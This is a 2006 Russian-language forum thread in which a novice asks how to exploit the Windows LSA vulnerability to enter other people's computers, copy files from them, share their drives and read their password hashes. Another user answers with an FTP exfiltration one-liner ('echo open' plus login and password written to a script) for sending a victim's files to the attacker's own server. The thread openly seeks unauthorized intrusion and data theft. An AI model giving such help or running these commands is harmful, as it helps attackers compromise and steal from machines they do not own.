Help Me!!!

Discussion in 'Болталка' started by Hawk, 5 Jan 2006.

1. Hawk

Hawk Guest

Reputations:
    0
    Всем привет!
    Помогите мне разабратца:
    1. После работы с exploit lsa, у меня в папке Windiws появляютца два файла от этого exploit'а! касперский их обнаруживает как вирус!
    Это так и далжно быть? Вредны ли они для моей ОС?
    2. Я плоха знаю cmd... Вот допустим, я зашёл спомощю exploit в чюжой камп, ну полазил нашёл шота интересное и мне это нада скачать на свой, как мне это зделать?
    Какими кампандами?
    PS Если можна поподробней расскажите, ато может непойму! :)
    3. вот, я сежу в чужом кампе через cmd... Мне нада допусти открыть с разришением изменять диск С на чужом кампе... Как мне это зделать?
    4. Тотже самое... Я сежу на чужом кампе через cmd...:)) И мне нада посматреть root пасс венды этой, чтоб потом зайти туда нармальна...
    Куда мне нада зайти и какой фаил открыть, чтоб посматреть root пасс?? Я так понимаю он будет зашифрован... Если да, то в чём он будет зашифрован
    В MD5 или чёмта другом?? :)
    PS Плызз тоже если можна поподробней! :)
    Это всё, чтобы мне хателось узнать! :)
    Плызз, кто знает ссылки на експлойты которые нетока на 445 порт, а на другие порты... Вылажите если нетрудна... Можна и в ПМ! :)
    Всем, кто мне поможет огромное спасибо и респек! ;)

#1 Hawk, 5 Jan 2006
    Last edited by a moderator: 5 Jan 2006
  2. D1mOn

D1mOn Elder - Старейшина

Reputations:
    29
    он их не как вирусы определил, а как эксплойты для ХР, не вредны они.

3. Hawk

Hawk Guest

Reputations:
    0
    Спасибо! В следующий раз буду внемательней, ато, я нечитаю, что пишет антивирус... (Буду знать набудуещее)

4. D1mOn

D1mOn Elder - Старейшина

Reputations:
    29
    Запусти у себя на компе фтп сервер конектись к своему компу командой echo open твой ip>go&&echo логин>>go&&echo пароль>>go
    и сливай файл

5. Hawk

Hawk Guest

Reputations:
    0
    Конектитца надо именна к своему кампу?? На другой нельзя заливать? Ато у меня нету ФТП сервера и установочного файла... (ну это непроблема можна достать) После пароль>>go писать имя файла? И пайдёт заливка этого файла? Если это так, то как писать его имя например пароль>>go cd\D:\papak\imau faila ?? Если нет плызз объясни попонятней! :)
    ======================
    У меня ещё появился вапрос для чего exploit создаёт в папке с вендой два файла своих?

6. D1mOn

D1mOn Elder - Старейшина

Reputations:
    29
  7. Hawk

Hawk Guest

Reputations:
    0
    Огромное спасибо!))) Скачал! Посматрю попробую поучюсь... А потом напишу вышла ли!)))

8. D1mOn

D1mOn Elder - Старейшина

Reputations:
    29
    всегда пожалуйста)))

9. Hawk

Hawk Guest

Reputations:
    0
    Невышла у меня!))) Ну правда, я пробывал не своё ФТП... Ещё попробую со своим ФТП!))) Наверное поэтому и писалось, что ошибка при создание тех файлав, чтоб добыть пасс!)) (но файлы создавались ,а когда дашло дело до каманды, чтоб пасс вылетил вместо этого вылетила ошибка)))) ) Но в этом видео было как достать пасс... А мне нада, чтоб файлы копирывать с чюжого кампа на свой, ну и можна наоборот!))
    =====================
    Кажись, я плоха посматрел видео!))) Чтота мне подсказует, что там был момент копирывания, указаный с камандами как это зделать!)))
    =====================
    А на 3 и 4 вапросы некто незнает ответа? :) Меня самого ламали 3 способом раньше!)) А щяс фигушки!) Неделю назад сидел венду настравила целый день!)))

10. D1mOn

D1mOn Elder - Старейшина

Reputations:
    29
    Я не понял 3 вопрос.
    4. Наскольяко я знаю никак)))

11. Hawk

Hawk Guest

Reputations:
    0
    Разабрался наконецта с ФТП! :) После сразу появился вапрос какой камандай закачать туда фаил! :) После того, как уже прописал eche open... (ну и т.д. логин и всё такое)... Какой камандай закачать фаил на ФТП и как к нему указать путь (к файлу который нада закачать)? :)
    =============================
    Перестрою третий вапрос! :)
    Как открыть локальный диск с удалённого кампа в шарах (сетевых окружениях)...

12. Hawk

Hawk Guest

Reputations:
    0
    Неужели некто незнает? :/ Плызз поделитесь знанием, кто знает!! (можна и в ПМ если нехатите, чтоб могли все прочестЬ!) :)